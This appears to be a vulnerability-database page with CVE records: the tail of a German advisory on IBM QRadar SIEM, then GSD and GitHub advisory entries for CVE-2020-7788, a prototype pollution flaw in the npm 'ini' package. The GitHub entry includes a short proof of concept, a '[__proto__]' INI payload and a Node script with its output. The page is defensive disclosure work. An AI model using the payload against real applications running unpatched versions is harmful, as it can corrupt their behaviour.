Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-32804" }, { "cve": "CVE-2021-33502", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-33502" }, { "cve": "CVE-2021-3672", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-3672" }, { "cve": "CVE-2021-37701", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-37701" }, { "cve": "CVE-2021-37712", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-37712" }, { "cve": "CVE-2021-37713", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-37713" }, { "cve": "CVE-2021-3807", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-3807" }, { "cve": "CVE-2021-3918", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-3918" } ] }
gsd-2020-7788
Vulnerability from gsd
Modified
2023-12-13 01:21
Details
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Aliases
Aliases
{ "GSD": { "alias": "CVE-2020-7788", "description": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "id": "GSD-2020-7788", "references": [ "https://access.redhat.com/errata/RHSA-2022:0350", "https://access.redhat.com/errata/RHSA-2022:0246", "https://access.redhat.com/errata/RHSA-2021:5171", "https://access.redhat.com/errata/RHSA-2021:3281", "https://access.redhat.com/errata/RHSA-2021:3280", "https://access.redhat.com/errata/RHSA-2021:0551", "https://access.redhat.com/errata/RHSA-2021:0549", "https://access.redhat.com/errata/RHSA-2021:0548", "https://access.redhat.com/errata/RHSA-2021:0521", "https://access.redhat.com/errata/RHSA-2021:0485", "https://access.redhat.com/errata/RHSA-2021:0421", "https://advisories.mageia.org/CVE-2020-7788.html", "https://linux.oracle.com/cve/CVE-2020-7788.html", "https://access.redhat.com/errata/RHSA-2022:6595" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2020-7788" ], "details": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "id": "GSD-2020-7788", "modified": "2023-12-13T01:21:51.700208Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "report@snyk.io", "DATE_PUBLIC": "2020-12-11T10:43:26.139627Z", "ID": "CVE-2020-7788", "STATE": "PUBLIC", "TITLE": "Prototype Pollution" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "ini", "version": { "version_data": [ { "version_affected": "\u003c", "version_value": "1.3.6" } ] } } ] }, "vendor_name": "n/a" } ] } }, "credit": [ { "lang": "eng", "value": "Eugene Lim" }, { "lang": "eng", "value": "Government Technology Agency Cyber Security Group" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context." } ] }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Prototype Pollution" } ] } ] }, "references": { "reference_data": [ { "name": "https://snyk.io/vuln/SNYK-JS-INI-1048974", "refsource": "MISC", "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "name": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1", "refsource": "MISC", "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "name": "[debian-lts-announce] 20201221 [SECURITY] [DLA 2503-1] node-ini security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" } ] } }, "gitlab.com": { "advisories": [ { "affected_range": "\u003c1.3.6", "affected_versions": "All versions before 1.3.6", "cvss_v2": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "cwe_ids": [ "CWE-1035", "CWE-400", "CWE-937" ], "date": "2021-07-21", "description": "If an attacker submits a malicious `INI` file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.", "fixed_versions": [ "1.3.6" ], "identifier": "CVE-2020-7788", "identifiers": [ "CVE-2020-7788" ], "not_impacted": "All versions starting from 1.3.6", "package_slug": "npm/ini", "pubdate": "2020-12-11", "solution": "Upgrade to version 1.3.6 or above.", "title": "Prototype Pollution", "urls": [ "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" ], "uuid": "ad08b2d8-6544-4011-9f7d-1c9f1afba029" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ini_project:ini:*:*:*:*:*:node.js:*:*", "cpe_name": [], "versionEndExcluding": "1.3.6", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "report@snyk.io", "ID": "CVE-2020-7788" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-1321" } ] } ] }, "references": { "reference_data": [ { "name": "https://snyk.io/vuln/SNYK-JS-INI-1048974", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "name": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1", "refsource": "MISC", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "name": "[debian-lts-announce] 20201221 [SECURITY] [DLA 2503-1] node-ini security update", "refsource": "MLIST", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9 } }, "lastModifiedDate": "2022-12-02T19:40Z", "publishedDate": "2020-12-11T11:15Z" } } }
ghsa-qqgx-2p2h-9c37
Vulnerability from github
Published
2020-12-10 16:53
Modified
2022-12-03 03:55
Severity ?
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details
Overview
The ini
npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse
, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js: ``` var fs = require('fs') var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.proto) console.log(polluted) ```
```
node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
{ "affected": [ { "package": { "ecosystem": "npm", "name": "ini" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.6" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2020-7788" ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2020-12-10T16:51:39Z", "nvd_published_at": "2020-12-11T11:15:00Z", "severity": "HIGH" }, "details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```", "id": "GHSA-qqgx-2p2h-9c37", "modified": "2022-12-03T03:55:11Z", "published": "2020-12-10T16:53:45Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" }, { "type": "WEB", "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "type": "PACKAGE", "url": "https://github.com/npm/ini" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1589" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "type": "CVSS_V3" } ], "summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse" }
Loading...
Loading...
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.